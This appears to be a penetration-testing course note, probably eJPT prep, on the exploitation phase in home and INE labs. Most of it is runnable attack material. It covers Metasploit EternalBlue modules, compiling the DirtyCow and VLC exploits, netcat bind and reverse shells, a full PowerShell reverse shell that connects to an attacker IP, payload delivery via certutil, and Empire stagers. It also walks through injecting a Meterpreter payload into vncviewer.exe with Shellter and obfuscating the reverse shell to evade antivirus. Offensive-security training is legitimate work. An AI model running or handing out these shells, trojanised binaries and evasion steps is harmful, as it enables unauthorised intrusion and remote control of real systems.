Exploitation

⚡ Prerequisites

• Basic familiarity with Linux & Windows

• Basic understanding of TCP & UDP protocols

• Basic familiarity with Metasploit

📕 Learning Objectives

• Identify services vulnerabilities

• Search for and manipulate public exploit code

• Utilize exploitation frameworks, bind & reverse shells

• Perform exploitation in a black box pentest

• Evade signature-based antivirus solutions

🔬 Training list - PentesterAcademy/INE Labs

subscription required

🔬 Home Labs

🗒️ Exploitation is a phase of a penetration test that focuses on establishing access, initial foothold, to a system or resource by bypassing security restrictions.

With a proper vulnerability analysis, the exploitation attack vector should focus on the success probability and the high value target assets with the highest impact on the scanned organization.

• The use of automated exploitation tools (Metasploit, Powershell Empire, etc) shouldn't be prevalent

• Exploitation methodology:

  • Identify Vulnerable Services

  • Prepare Exploit Code

  • Gaining Remote access

  • Bypass AV detection

  • Pivoting

Vulnerability Scanning

• Identify running and vulnerable services

🗒️ Banner grabbing is the info gathering manual or automatic process used to obtain software and services name and version. The host server displays a text with this information as a banner.

Tools and techniques:

• nmap service version detection scan

• Netcat connection

• Authentication with a supported service

• curl / wget to get headers details of an HTTP server

Some useful commands from the lab environment:

• nmap

nmap -sV -O <TARGET_IP>
	
	22/tcp open  ssh   OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

ls -al /usr/share/nmap/scripts | grep banner
nmap -sV --script=banner <TARGET_IP>

	|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu 4ubuntu2.6

• nc / netcat

nc <TARGET_IP> <TARGET_OPEN_PORT>
nc <TARGET_IP> 22

	SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.6

• SSH Authentication

ssh root@<TARGET_IP>
	Welcome to attack defense ssh recon lab!! # SSH Welcome Banner

🗒️ Nmap Engine Scripting (NSE) - an nmap feature that allows to write simple scripts to automate a wide variety of tasks, like:

• network discovery

• sophisticated version detection

• vulnerability detection and exploitation

• backdoor detection

Scripts are written using the Lua programming language.

Nmap script default directory is:

• /usr/share/nmap/scripts

ls -al /usr/share/nmap/scripts | grep <keyword>

Some useful commands and nmap script scan from the lab environment:

nmap -sV -O <TARGET_IP>
	80/tcp open  http  Apache httpd 2.4.6 ((Unix))

nmap -sV -p 80 --script=http-enum <TARGET_IP>

ls -al /usr/share/nmap/scripts | grep shellshock

nmap -sV --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" <TARGET_IP>

# Vulnerable to the CVE-2014-6271

Focus on the techniques and the flow to detect vulnerabilities.

sudo nmap -sS -sV <TARGET_IP>

searchsploit EternalBlue
searchsploit ms17-010

# Check the vulnerability with a scanner, before trying to exploit it
msfconsole

search eternalblue
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS <TARGET_IP>
run

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET_IP>
run

Searching for Exploits

Exploit code can be found online or inside locally-stored exploit database in pentest Linux distributions (searchsploit, MSF).

Verifiable online sources:

• • always check for the Verified column

  • use search filters

❗ Always pay attention at publicly available exploits. An exploit can be weaponized to attack the actual attacker system!

📌 Analyze the exploit code behavior to ensure that it works as intended.

🗒️ searchsploit - command line search tool for Exploit-Db that allows to have an offline copy of the Exploit-Db.

• Useful for security assessments on networks without Internet access

• Pre-packed with Kali Linux

• exploitdb local directory is:

  • /usr/share/exploitdb

# Debian-based distro install
sudo apt update && sudo apt -y install exploitdb

ls -al /usr/share/exploitdb

# Update the exploitdb package updates
searchsploit -u

searchsploit [options] <term>
searchsploit vsftpd 2.3.4

# Copy an exploit to the current working dir
searchsploit -m 49757    

# Case sensitive search
searchsploit -c OpenSSH

# Search just the exploit title
searchsploit -t vsftpd

# Exact search on title
searchsploit -e "Windows 7"

# Filters search
searchsploit remote windows smb
searchsploit remote linux ssh
searchsploit remote linux ssh OpenSSH
searchsploit remote webapps wordpress
searchsploit local windows
searchsploit local windows | grep -e "Microsoft"

# List online links
searchsploit -w remote windows smb | grep -e "EternalBlue"

Fixing Exploits

Cross-Compiling Exploits

Exploit code developed in C, C++, C# has to be compiled into a portable executable or binary.

🗒️ Cross-compilation is the process of building on one platform a binary that will run on another platform.

• Compiling C code is a necessary skill

e.g. of Windows and Linux exploit code compiling

Tools:

sudo apt -y install mingw-w64 gcc

Windows

• Download the VLC exploit or use searchsploit

searchsploit VideolAN VLC SMB
searchsploit -m 9303

• Compile the C exploit

  • check for comments in the code regarding the compilation commands

# Compile for x64
x86_64-w64-mingw32-gcc 9303.c -o exploit64.exe

# Compile for x86 (32-bit)
i686-w64-mingw32-gcc 9303.c -o exploit32.exe

Linux

• Download the DirtyCow exploit or use searchsploit

searchsploit Dirty Cow
searchsploit -m 40839

• Compile the C exploit

  • check for comments in the code regarding the compilation commands to compile it successfully

# Compile with
gcc -pthread 40839.c -o dirty_exploit -lcrypt

nc - a network utility used for a variety of tasks associated with TCP/UDP.

• Client mode - used for connection to any TCP/UDP port or to a listener

• Server Mode - used as a listener for connection from clients on a specific port

Functionalities:

• open TCP connections, listen on TCP or UDP ports

• Banner grabbing, Port scanning, Files transferring

• Bind/Reverse shells

# Debian based distro - install
sudo apt update && sudo apt install -y netcat

🔬 Some HFS Lab commands

nc <TARGET_IP> <TARGET_PORT>
nc -nv 10.2.23.227 80
# -n = no DNS resolution
# -v = verbose

nc -nvu 10.2.23.227 445
# -u = UDP port

Setup a listener:

• Transfer nc.exe to the windows target

# Attacker machine
ip -br -c a
	10.10.24.4/24
cd /usr/share/windows-binaries/
python -m SimpleHTTPServer 80


# Target machine
cd Desktop
certutil -urlcache -f http://10.10.24.4/nc.exe nc.exe

• Setup a listener on the attacker machine

# Attacker machine
nc -nvlp 1234
nc -nvlup 1234 # listen on a UDP port


# Target machine
nc.exe -nv 10.10.24.4 1234
nc.exe -nvu 10.10.24.4 1234

# A connection is received on the Attacker machine

• Transfer files with nc

# A listener must be present on the target system
# Target machine
nc.exe -nvlp 1234 > test.txt

# Attacker machine
echo "Hello target" > test.txt
nc -nv 10.2.23.227 1234 < test.txt

Bind Shells

🗒️ Bind Shell - a remote shell where the attacker connects to the listener running on the target system and execute commands on the target system.

• Bind shells issues:

  • Must have access to the target system

  • Inbound traffic can be blocked by a firewall, it is very suspect

• A netcat listener must be configured on the target system to execute:

• cmd.exe - Windows

• /bin/bash - Linux

🔬 Same lab as above (IPs might change)

• Once uploaded the nc.exe on the target system, proceed with the bind shell

# Target Win machine - Bind shell listener with executable cmd.exe
nc.exe -nvlp 1234 -e cmd.exe

# Attacker Linux machine
nc -nv 10.2.22.140 1234

# Target Linux machine - Bind shell listener with /bin/bash
nc -nvlp 1234 -c /bin/bash

# Attacker Win machine
nc.exe -nv 10.10.24.2 1234

Reverse Shells

🗒️ Reverse Shell - a remote shell where the target connects to a listener running on the attacker's system (e.g. Metasploit Meterpreter).

• Reverse shells advantages:

  • The connection can be initialized without netcat too

  • Outgoing traffic may not be blocked by firewalls

• Reverse shells issues:

  • used exploit have to know the attacker's IP

  • the attacker's IP can be logged as malicious or present in the exploit file

# Attacker Linux machine
nc -nvlp 1234

# Target Win machine
nc.exe -nv 10.10.18.3 1234 -e cmd.exe

# Attacker Linux machine
nc -nvlp 1234

# Target Linux machine (localhost in this case)
nc -nv 127.0.0.1 1234 -e /bin/bash

Reverse Shell without Netcat

• Examples of Reverse Shell with different code (bash, Python, Powershell, PHP, etc)

e.g.

# Kali Linux attacker machine
nc -nvlp 9001

# Windows target machine
# Run CMD and paste the code below
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.31.128',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Exploitation Frameworks

• Focus on the Exploitation phase

• Modular

• MSF turns the exploit code into a module, using the Ruby programming language

Empire - PowerShell post-exploitation framework for Win, Linux and macOS

• PowerShell-Empire is primarily designed for Windows targets

• Starkiller - GUI frontend for PowerShell-Empire

sudo apt update && sudo apt install -y powershell-empire

🔬 Home Lab based on a Kali Linux attacker VM and Win7 target VM with IP 192.168.31.131

sudo powershell-empire server

• In another terminal tab

sudo powershell-empire client

listeners
agents

• Open Starkiller

  • http://localhost:1337/index.html#/

  • Credentials: empireadmin:password123

• Run the csharpserver

• Create a http listener to receive the reverse connection from the target system

• Generate a Stager with windows_csharp_exe type

• Actions - Download the Sharpire.exe stager

# Open a new terminal window
cd Downloads
python3 -m http.server 80

# On the Windows VM download the Sharpire.exe from http://192.168.31.128/
# Run it

• Back on the Starkiller Agents page, check for the active agent

• Back in the Empire terminal session

agents
interact <ID>
history

Windows Black Box Exploitation

🗒️ Black Box penetration test - security assessment conducted without any internal system or network knowledge.

• The pentester act like an external unprivileged hacker from outside the network

• No information about the target system

Typical Black Box Methodology:

• Host discovery ➡️ Port Scanning ➡️ Enumeration

• Vulnerability detection

• Exploitation ➡️ Manual/Automated

• Post Exploitation - PrivEsc ➡️ Persistence ➡️ Dumping Hashes

e.g.

Scenario

• Penetration Test to gain access and exploit a Win Server 2008 host.

Scope

• Identify running and vulnerable services on the target

• Exploit the vulnerabilities to obtain a foothold

• Identify easily exploitable services

• Pick the target as efficiently as possible

• Time is a factor

Linux Black Box Exploitation

Scenario

• Penetration Test to gain access and exploit a Linux server host.

Scope

• Identify running and vulnerable services on the target

• Exploit the vulnerabilities to obtain a foothold and gain access to the system

AV Evasion & Obfuscation

• Antivirus detection methods can be classified as follows:

• On-disk Evasion techniques

  • Obfuscation - The act of hiding anything crucial, useful, or vital. Code is reorganized through obfuscation to make it more difficult to decipher or reverse engineer.

  • Encoding - The process of transforming data into a new format using an encoding strategy. Data can be encoded to a new format and then decoded back to its original format since encoding is a reversible operation.

  • Packing - Generate executables with updated binary structures, lower in size and a new payload's signature.

  • Crypters - Encrypts payloads, then the encrypted code is decrypted in memory. The decryption key is typically kept in a stub. (ransomware)

• In-memory Evasion techniques

  • Memory manipulation rather than writing files to disk

  • Payload is injected into a process, then executed in memory in a separate thread

Shellter - dynamic shellcode injection tool and dynamic PE (Portable Executable) infector ever created.

• Uses a unique dynamic approach based on the execution flow of the target app

• Takes advantage of the original structure of the PE file

• Supports any 32-bit payload (generated either by metasploit or custom ones by the user)

• Portable

• Compatible with Windows x86/x64 (XP SP3 and above) & Wine/CrossOver for Linux/Mac

🔬 Home lab with Kali Linux and Win7 VMs

sudo apt update && sudo apt install -y shellter

# Wine64 will be automatically installed
# Win32 needs additional commands to install it
sudo dpkg --add-architecture i386 && sudo apt update && sudo apt -y install wine32
rm -r ~/.wine

cd /usr/share/windows-resources/shellter

• Execute an exe file on Linux

sudo shellter

• Inject the shellcode into/usr/share/windows-binaries/vncviewer.exe file after copying it to a folder

mkdir AVBypass
cd AVBypass
cp /usr/share/windows-binaries/vncviewer.exe .

• In the SHELLTER windows, choose A for automatic

• PE Target: /home/kali/certs/ejpt/AVBypass/vncviewer.exe

• Stealth Mode: Y = vncviewer will function as normal and the shellcode will be executed in the background

• Payload: L - 1

• LHOST: Attacker's IP - 192.168.31.128

• LPORT: 1234

• Now the /home/kali/certs/ejpt/AVBypass/vncviewer.exe file has been replaced by the Shellter generated malicious executable

• Copy the vncviewer.exe file to the target machine

# Attacker VM
cd /home/kali/certs/ejpt/AVBypass/
sudo python -m http.server 80

# In another terminal
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.31.128
set LPORT 1234
run

• Run the vncviewer.exe file and chheck the msfconsole Meterpreter session

PowerShell Code Obfuscation

🔬 Home lab with Kali Linux and Win7 VMs

• Kali Linux install PowerShell

cd /opt
sudo git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
sudo apt update && sudo apt install -y powershell

• Run pwsh

pwsh
cd /opt/Invoke-Obfuscation/
Import-Module ./Invoke-Obfuscation.psd1
cd ..
Invoke-Obfuscation

• Create the reverse PowerShell script in a new file

  • PowerShell Reverse Shell code will be

cd /home/kali/certs/ejpt/AVBypass/    
nano shell.ps1

$client = New-Object System.Net.Sockets.TCPClient('192.168.31.128',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

• Back in Invoke-Obfuscation

SET SCRIPTPATH /home/kali/certs/ejpt/AVBypass/shell.ps1
AST
ALL
1

• Obfuscated code is:

Set-Variable -Name client -Value (New-Object System.Net.Sockets.TCPClient('192.168.31.128',4242));Set-Variable -Name stream -Value ($client.GetStream());[byte[]]$bytes = 0..65535|%{0};while((Set-Variable -Name i -Value ($stream.Read($bytes, 0, $bytes.Length))) -ne 0){;Set-Variable -Name data -Value ((New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i));Set-Variable -Name sendback -Value (iex $data 2>&1 | Out-String );Set-Variable -Name sendback2 -Value ($sendback + 'PS ' + (pwd).Path + '> ');Set-Variable -Name sendbyte -Value (([text.encoding]::ASCII).GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

cd /home/kali/certs/ejpt/AVBypass/    
nano obfuscated.ps1

# Attacker VM another terminal
cd /home/kali/certs/ejpt/AVBypass/
sudo python -m http.server 80

nc -nvlp 4242

• Run the obfuscated.ps1 file on the Win10 VM

• Back on the Kali VM check the PowerShell reverse shell